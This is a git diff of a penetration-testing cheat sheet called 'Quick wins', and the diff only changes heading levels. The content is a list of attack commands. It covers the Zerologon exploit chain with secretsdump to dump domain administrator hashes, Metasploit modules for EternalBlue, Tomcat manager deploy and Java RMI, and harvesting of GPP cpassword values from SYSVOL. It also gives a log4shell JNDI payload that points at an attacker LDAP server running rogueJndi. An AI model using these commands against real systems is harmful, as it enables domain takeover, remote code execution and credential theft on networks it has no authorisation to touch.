--- a/02. Quickw wins.md
+++ b/02. Quickw wins.md
@@ -1,37 +1,37 @@
-### Quick wins  
-# zerologon (unsafe) - (CVE-2020-1472)  
+# Quick wins  
+## zerologon (unsafe) - (CVE-2020-1472)  
   
 python3 cve-2020-1472-exploit.py <MACHINE_BIOS_NAME> <ip>  
 secretsdump.py <DOMAIN>/<MACHINE_BIOS_NAME>\$@<IP> -no-pass -just-dc-user "Administrator"   
 secretsdump.py -hashes :<HASH_admin> <DOMAIN>/Administrator@<IP>  
 python3 restorepassword.py -target-ip <IP> <DOMAIN>/<MACHINE_BIOS_NAME>@<MACHINE_BIOS_NAME> -hexpass <HEXPASS>  
   
-# Eternal Blue  
+## Eternal Blue  
 MS17-010  
 	exploit/windows/smb/ms17_010_eternalblue  
   
-# SYSVOL & GPP  
+## SYSVOL & GPP  
 MS14-025  
 	use scanner/smb/smb_enum_gpp  
 	findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml  
   
-# tomcat/jboss manager  
+## tomcat/jboss manager  
 	auxiliary/scanner/http/tomcat_enum  
 exploit/multi/http/tomcat_mgr_deploy  
   
-# java rmi  
+## java rmi  
 	exploit/multi/misc/java_rmi_server  
   
-# java serialized port  
+## java serialized port  
 	ysoserial  
   
-# vulnerable product with cve  
+## vulnerable product with cve  
 	searchsploit  
   
-# log4shell  
+## log4shell  
 	${jndi:ldap://<ip>:<port>/o=reference}  
 		rogueJndi-1.0.jar  
   
-#database credentials  
+##database credentials  
 	use admin/mssql/mssql_enum_sql_logins  
   
